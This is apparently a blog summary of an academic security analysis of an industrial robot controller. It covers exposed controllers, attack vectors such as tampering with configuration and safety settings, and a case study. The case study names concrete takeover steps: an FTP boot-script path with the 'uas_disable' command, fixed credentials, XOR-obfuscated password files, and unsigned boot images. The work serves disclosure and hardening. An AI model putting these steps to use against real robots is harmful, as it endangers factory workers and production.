An experimental security analysis of an industrial robot controller

An experimental security analysis of an industrial robot controller Quarta et al., IEEE Security and Privacy 2017

This is an industrial robot:

The International Federation of Robotics forecasts that, by 2018, approximately 1.3 million industrial robot units will be employed in factories globally, and the international market value for “robotized” systems is approximately 32 billion USD. In all of their forms, robots are complex automation devices that heavily interact with the physical world…

Most of these control systems were born in an era when they were assumed to be isolated from the network, but are now gaining new interconnections. And hey, guess what:

Unfortunately, even a simple Shodan query shows that sometimes industrial robots are exposed on the Internet without being properly secured.

In this paper, the authors undertake a systematic analysis of the attack surface and potential impacts of cyber attacks against industrial robots. Their findings are sadly not surprising, yet at the same time some of the things you’re about to read may leave you open-mouthed in disbelief. It’s a perfect case study in how not to do things!

Welcome to Industry 4.0 and the world of connected robots

Industrial robots are “connected” primarily for programming and maintenance purposes – a use case specified by ISO standards. For instance, in a large car production plant developed by KUKA Robotics, all the 259 robots are connected to central control and monitoring systems.

The industrial robot ecosystem is blooming, there are “Robot Web Service” HTTP REST APIs, a Robot App Store (http://www.robotappstore.com/), and venues where users can exchange models, videos, add-ins and “apps” (https://robotapps.robotstudio.com). The authors make three high level observations about the ecosystem:

  1. The increased connectivity of computer and robot systems is (and will be) exposing robots to cyberattacks. Indeed, nowadays, industrial robots – originally designed to be isolated – are exposed to corporate networks and to the Internet.
  2. The safety systems governing robots are increasing implemented in software.
  3. Awareness of security risks within the ecosystem is very low (confirmed by both a small scale survey undertaken by the authors, and the shocking state of security in practice as we’ll see).

In order to attack industrial robots, you need to know something about them of course. Thankfully that knowledge is easy to obtain:

Realistically [attackers] can rely on publicly available information (e.g., controller software and firmware available for download from the vendor’s website), and some reverse engineering. As a matter of fact, we learned most of the details described in this paper by reading freely available technical documentation. Therefore, an attacker can do the same.

If you want access to equipment to verify your attacks before deploying them you’ve got two routes open to you. Firstly, vendors distributed simulators – which at least in one case share most of the code (and thus most of the vulnerabilities) with the firmware of the controller’s computer. Secondly you can buy parts or even complete robots on the second hand market (for costs ranging from 13K-36K).

Robot controllers may be accessible over the network in one of several ways:

  • At the base level, they may just be connected to the factory LAN, which an attacker can gain access to through a variety of methods (out of scope for this paper).
  • Sometimes controllers are directly accessible from the Internet – using Shodan and ZoomEye to look for string patterns in the FTP banners of top robot manufactures found several hits. (And as we’ll see, you can change the robot configuration by uploading files via that FTP service).
  • Most commonly, robots embed proprietary remote access devices used by the vendor for remote monitoring and maintenance. In the industry jargon, these are known as industrial routers. We could call them ‘backdoors.’

Industrial routers provide a helpful attack surface to gain access to a robot controller. For example, an attacker could target a widespread vendor of such appliances, whose products are also resold by robotics OEMs as part of their support contracts. Among these vendors, eWON is quite representative. A simple Shodan query for the default banner of the embedded web server (Server: eWON) yielded 1,044 results, without accounting for customized banners. The web-based configuration console is easily “fingerprintable,” and attacker could exploit vulnerabilities or misconfigurations in the router
to gain access to the robot

Threat scenarios

Given the nature of the tasks that industrial robots undertake, they require accuracy, safety, and integrity.

  • A robot should read precise values from sensors and should issue correct and accurate commands to the actuators so that movements are performed within acceptable error margins. “A violation of this requirement could translate into small defects in the outcome. For example, if a robot is used for welding, a minimal change in how the weld is carried out could structurally undermine the workpiece, which in the case of a car body could possibly mean tragic consequences for the end user safety.
  • Safety requirements are governed by ISO standards, and require that operators always be able to take safe and informed decisions, and engage emergency procedures when needed.
  • A robot controller also needs to minimise the risk of badly written control logic damaging its parts.

At a high level attackers can attempt to violate these requirements to a variety of ends. For example, injecting faults and micro-defects in production, which could lead to immediate or delayed financial loss, damaged reputation, and possibly even fatalities depending on what is being manufactured. An attacker could also damage machinery or cause injuries to factory workers by disabling or altering safety devices. Then there are ‘denial of production’ attacks which introduce downtime: “the vice president of product development at FANUC stated that ‘unplanned downtime can cost as much as 20,000 potential profit loss per minute, and latex 2 million for a single incident.” (That’s a whole new kind of ransomware waiting to happen right there). Finally it might just be good old industrial espionage – leaking sensitive data about production schedules and volumes, source code etc..

Attacks

To make things a bit more concrete, here are five attack vectors.

  1. Configuration tampering. An attacker able to access a configuration file can modify parameters affecting robot movements. Closed loop control systems make a controlled variable follow a reference signal as closely as possible. The parameters affect how well they are able to do this. Sub-optimal tuning can result in the robot being slow to reach the desired position, violating accuracy requirements (think poor welds, milling too much material away). Bad parameter settings can read to controller instability, overshooting of set points, and violation of safety properties and ultimately potential for physical damage. There are also open loop control systems designed to smooth the signals generated by closed loop controls. Fiddling with their settings can amplify resonance effects leading to violations of integrity requirements and safety boundaries. The configuration also contains core settings specific to the type of manipulator (controller models are often shared across different robots). Change these and you can alter the amount of force applied (to exceed safety limits), or simply destroy either the workpiece or its surrounding environment. Finally, several kinds of safety limits are also specified in the configuration file, allowing them to be changed at will by the attacker.
  2.  User-perceived robot state alteration. “The impact of a mere UI-modification attack is remarkable. Altering the UI could hide or change the true robot status, fooling operators into a wrong evaluation of risk, and , consequently, creating a substantial safety hazard.”
  3.  Robot state alteration. Beyond altering the perceived state as above, an attacker can also alter the actual state of the robot. For example, silently switching between manual mode (which gives a set of safeguards for teaching the robot) and automatic mode when humans should not be nearby. Furthermore, “Some vendors implement safety features, such as emergency stop buttons in software. Worse modern teach pendants (which include an e-stop button) are wireless…”
  4.  Production logic tampering. If the end to end integrity of the file defining the task the robot is to carry out is not protected, then it is possible for an attacker to arbitrarily alter production logic. “For example, the attacker could insert small defects, trojanize the workpiece, or fully compromise the manufacturing process.”
  5.  Calibration parameters tampering. Calibration data is passed to the controller during system boot, but can also be manipulated later on. This can cause a servo motor to move erratically or unexpectedly.

A case study

As an example, the authors evaluate one specific system and demonstrate attacks against. I have a suspicion they could have picked many other targets and obtained very similar findings. You can find the full details in section VI of the paper. I’m just going to highlight here some of the more jaw-dropping discoveries.

The robot uses FTP to share files and system information between the robot and the internal network and custom services. There is also a ‘RobAPI’ (TCP protocol) that offers a more comprehensive network attack surface, and a UDP-based discovery service to help discover robot controllers on the network (how thoughtful!). There is an optional User Authentication System, which when enable uses a simple role-based access control scheme.

The authentication is useless

Firstly, it’s disabled during system boot, when a set of hard-coded default static credentials can be used to access the shared file system. Secondly, there is a default user, without a password, than cannot be changed or removed. Then there is a another specific user that can ‘only’ access FTP paths relating to the/command device driver (see the next section), whose credentials are embedded in the firmware and cannot be changed (the same for every instance of course).

If using any of these sets of credentials is too much hassle, it’s also possible to completely bypass authentication via both the FTP and RobAPI access due to an implementation flaw.

The controller can be completely reconfigured via FTP upload

Any file written over FTP to the path /command/command or /command/command.cmd is interpreted as a script executed during booting. The remote service box for example using this functionality to automatically configure itself. If you include the command shell uas_disable in this file the user authentication system will be disabled.

The “cryptography” is a joke

encryption schemes are used to safeguard the integrity of some specific and safety-critical configuration files, such as the ones containing sensitive control loop parameters. We found such schemes to be weak obfuscation/integrity mechanisms rather than proper encryption: keys are derived from the file name and, in some cases, part of the file content. By reverse engineering the controller firmware, we found all the information needed to reconstruct the encryption keys: An attacker who can access a firmware update, or who has file system access, is able to read and modify safety- and accuracy-critical configuration files.

Here’s an example, the UAS configuration including the plaintext passwords of all users) is stored in an XML file obfuscated through a bit-wise XOR operation with a random key. In case you need it, the key is stored at the beginning of the obfuscated file itself. To quote the authors, “the obfuscation is completely useless.

There is no protection against memory errors

… it is far easier to exploit memory corruption vulnerabilities in the robot we analyzed than in mainstream OSs. Industrial robots, like many embedded systems, employ real-time operating systems (RTOSs) with poor or no hardening features.

Given that there is also no privilege separation between processes or between user space and kernel space, exploiting memory corruption is trivial. And did the authors find such exploitable memory errors in the code? Of course they did!

The fact that we found textbook vulnerabilities in one of the most widely deployed robot controllers is an indicator that not even basic static checking was in place.

Nothing is signed

The boot image that the system downloads is not signed, and can be easily modified by an attacker who can reverse engineer the file format (hint: it’s a zip-compressed binary). There are no code-signing mechanisms for vendor firmware, program task code, or custom software developed on top of the provided SDKs.

Security checks aren’t checked

The compliance tool that checks code doesn’t perform a set of restricted operations such as use of reflection and raw access to the filesystem only makes checks within the development environment. And even then the checks it does are too simplistic (e.g., an incomplete blacklist for file operations, that still permits full unrestricted access to the shared file system). But it gets worse:

Alas, the version of the compliance tool provided with the SDK does not enforce these restrictions at all. It is also evident that an attacker could bypass this by simply modifying the compliance tool itself: there is no way to perform these security checks on the programmer’s side in a completely safe manner.

Everything is out of date

For backwards compatibility reasons, the ‘FlexPendant’ (human interface) “will continue running an old, unsupported, and potentially vulnerable version of the .NET framework.”

And so…

It should come as no surprise to you that the authors were able to successfully demonstrate attacks taking complete control over the controller.

Cyber security and safety standards

The authors give a set of guidelines for hardening industrial robot systems which you can find in section VII. Unfortunately, it looks like a long road ahead.

…none of the [existing industrial robots standards] account for cyber-security threats: although some of them have mild security implications, they do not explicitly account for adversarial control during risk assessment.

You may think some of the attacks described, such as manipulating welds so that they are deliberately weak, sound a little far-fetched. But I have reasons to believe that similar attacks have previously been demonstrated in the wild.